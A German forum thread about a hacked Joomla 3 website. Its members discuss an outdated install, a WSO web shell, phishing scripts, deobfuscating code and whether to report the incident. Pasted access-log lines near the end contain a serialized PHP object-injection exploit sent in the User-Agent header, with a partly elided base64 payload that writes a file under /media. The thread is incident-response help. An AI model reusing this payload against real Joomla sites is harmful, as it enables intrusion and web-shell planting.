Ich betreibe eine Joomla 3 Website, die gehackt wurde.
Ich habe die Seite offline genommen.

Zahlreiche php-Dateien wurden manipuliert.
Im Ordner htdocs habe ich Inhalte gefunden, die auf spanische bzw italienische Phishing Emails deuten.

Soll ich bei der Polizei Anzeige erstatten?
Die Seite wird kommerziell genutzt und muss neu aufgesetzt werden (auch in der Datenbank habe ich Änderungen entdeckt, zB "neue" Superuser) - es ist also ein Schaden entstanden.

Falls es jem. interessiert, kann ich die PHP Dateien mal zusenden. Evtl. kann jemand sagen, was die da gemacht haben.

Im log wurde "index.PHP/this-is-the-test-of-door" aufgerufen. Kommt das jem. evtl bekannt vor?

Das war vermutlich ein Spider/Bot. War die Installation inkl. aller Erweiterungen aktuell? Eher nicht, oder?

Eine Anzeige zu stellen ist eher aussichtslos. Solltest du für die Wartung verantwortlich und das System nicht aktuell gewesen sein, dann könnte dir das geschädigte Unternehmen sogar einen Strick draus drehen. Vor allem wenn nicht mal Backups aller Daten vorliegen.

Vor einigen Wochen ging die Meldung durch einige IT Seiten das man Joomla unbedingt updaten sollte wegen aktiv genutzter Lücke. Ich glaube sogar zweimal Hintereinander.

Es gab schon backups, aber ich habe die Datenbank lieber geleert, falls da noch was versteckt war.
Die Joomla updates habe ich wohl zu spät installiert, da war die Seite schon infiziert.
Jetzt läuft sie wieder sauber.
Warum hatten die dateizugriff auf die Ordner in Joomla? Wie haben die das geschafft?

Die letzte Seite, die bei mir mit Joomla gehackt wurde, hatte ein "Out of the Box" unsicher Feature aktiv, was man erst manuell abschalten musste.

Ob die das immer noch haben? :D Ist ein verstecktes Login Formular und es gibt einen Superuser, mit dem man sich dort einloggen kann. Dann wurde da ein Modul hochgeladen, was ein php Dateisystemmanager beinhaltete, womit ein pishing Mail versende Script hochgeladen wurde.
Grob zusammengefasst - aber ist bei dir vielleicht eine neue Lücke..

Edit: Kannst auch gerne ne PN schreiben, falls du noch was brauchst an Hilfe. Aber ich bin mir nicht sicher, inwieweit ich helfen kann. :D

Habe mal nachgeschaut: Die Benutzer-Registrierung ist ausgeschaltet. Ich glaube das ist Standard-mäßig in Joomla 3.
In Joomla 2 musste man es noch extra machen.
Meinst du das?

Soll ich dir die "infizierten" PHP-Dateien mal zusenden? Kannst du sagen, was die Hacker da gemacht haben?
In einer Datei war auch ein großer Teil mit vermutlich verschlüsselten Daten. Da kommt man wohl nicht dahinter, was das sein könnte, oder?

Die Datei ist (ziemlich sicher) nicht verschlüsselt, sondern nur "obfuscated". (base64, rot13 und co)

Du kannst den kompletten Inhalt der Datei mal via copy&paste auf https://www.unphp.net/ hochladen und schauen was der ausspuckt.

Sehr warscheinlich kommt dann eine Webshell/Filemanager oder ein Mailerscript zum Vorschein.

@Birdman: Du hast Post...

Ich will hier keinen potentiell schädlichen PHP-Code veröffentlichen.

@all: Sagt jemandem die "wso_version cheebeezedition" was? Das war das einzig "markante" das ich im Code entdeckt habe.

In einer PHP-Datei war auch ein Bereich mit "Bruteforce" :frown:
Also war die Website Teil eines Bot-Netzes, oder?

"wso" könnte auf die "WSO Web Shell" hindeuten - eine häufig benutzte PHP basierte Webshell.

Aus dem Urban dictionary:
Cheebees
A specific Embry-Riddle Aeronautical University rat, living as an illegal alien somewhere in the vicinity of the Mingus Mountain Complex. Likes the back of necks and has a slight sneezing problem.

Passt ja. Code, der unerwünscht ist und einem (immer) im Nacken sitzt.
Ich wundere mich nur, warum google nicht mehr dazu ausspuckt.

Kann ich den Code irgendwo "melden", zB bei Produzenten von Antivirus-Software?

Habe mal nachgeschaut: Die Benutzer-Registrierung ist ausgeschaltet. Ich glaube das ist Standard-mäßig in Joomla 3.
In Joomla 2 musste man es noch extra machen.
Meinst du das?

Denke ja, klingt so.

Soll ich dir die "infizierten" PHP-Dateien mal zusenden? Kannst du sagen, was die Hacker da gemacht haben?
In einer Datei war auch ein großer Teil mit vermutlich verschlüsselten Daten. Da kommt man wohl nicht dahinter, was das sein könnte, oder?
Wenn der Code verschlüsselt wäre, dann müsste im Code entweder der Schlüssel sein oder jemand würde den Schlüssel von außen nutzen/mitbringen.

Du kannst mir den Code gerne schicken, aber ich denke nicht, dass ich da groß was lesen kann. Kann zwar ein wenig php, bin aber Sysadmin. Neugierig bin ich, also nur zu..

An einen Antiviren Hersteller schicken bringt nichts. Wenn man Software nutzt, die nicht sicher ist, ist die Software nicht sicher. Da bringt dir auch ein Antivirus Programm nichts und deshalb werden die mit dem Code nichts anfangen wollen -> ist nicht die Zielgruppe (die ist immernoch mehrheitlich Windows Nutzer)

Ich habe in den Logs schon wieder etwas verdächtiges gefunden, kann es aber nicht recht deuten.
Ist die Seite etwa schon wieder gehackt worden?

13.80.17.248 - - [24/Mar/2016:06:00:09 +0100] "GET / HTTP/1.1" 200 5660 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3658:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEv eHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0Z ... [komisches geschwurbel] ... 0nKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\
13.80.17.248 - - [24/Mar/2016:06:00:16 +0100] "GET / HTTP/1.1" 200 5633 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3658:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ... [ komisches Geschwurbel ] ... 2UoJGZwKTs='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\
13.80.17.248 - - [24/Mar/2016:06:00:23 +0100] "GET /media/xxxx.php HTTP/1.1" 404 1441 "-" "python-requests/2.9.1"

Was ist das? unphp kann es nicht decoden.
Das gehört wohl zu dem 0-day exploit, der im Dezember bekannt geworden ist. Ich nutze jetzt Joomla 3.5 - bin ich wieder gehackt worden, oder nicht?

Das wurde PHP Code (und evtl. noch shell exploit zeugs?!?) als Browser/User Agent bei den HTTP Requests mitgegeben.

Wohl in der Hoffnung dass ein PHP Codeschnipsel welches eigentlich versucht den benutzten Browser des Besuchers herauszufinden (um entsprechend angepassten/kompatiblen Code auszuliefern) dann diesen Schadcode ausführt.

Und ist die Website jetzt wieder infiziert?

Und ist die Website jetzt wieder infiziert?
Nein, das ist erstmal nur ein billiger Angriffsversuch.
Vielleicht auch Teil des eingeschmuggelten Codes, aber da der bei dir nicht mehr aktiv ist, würde ich mir keine Sorgen machen.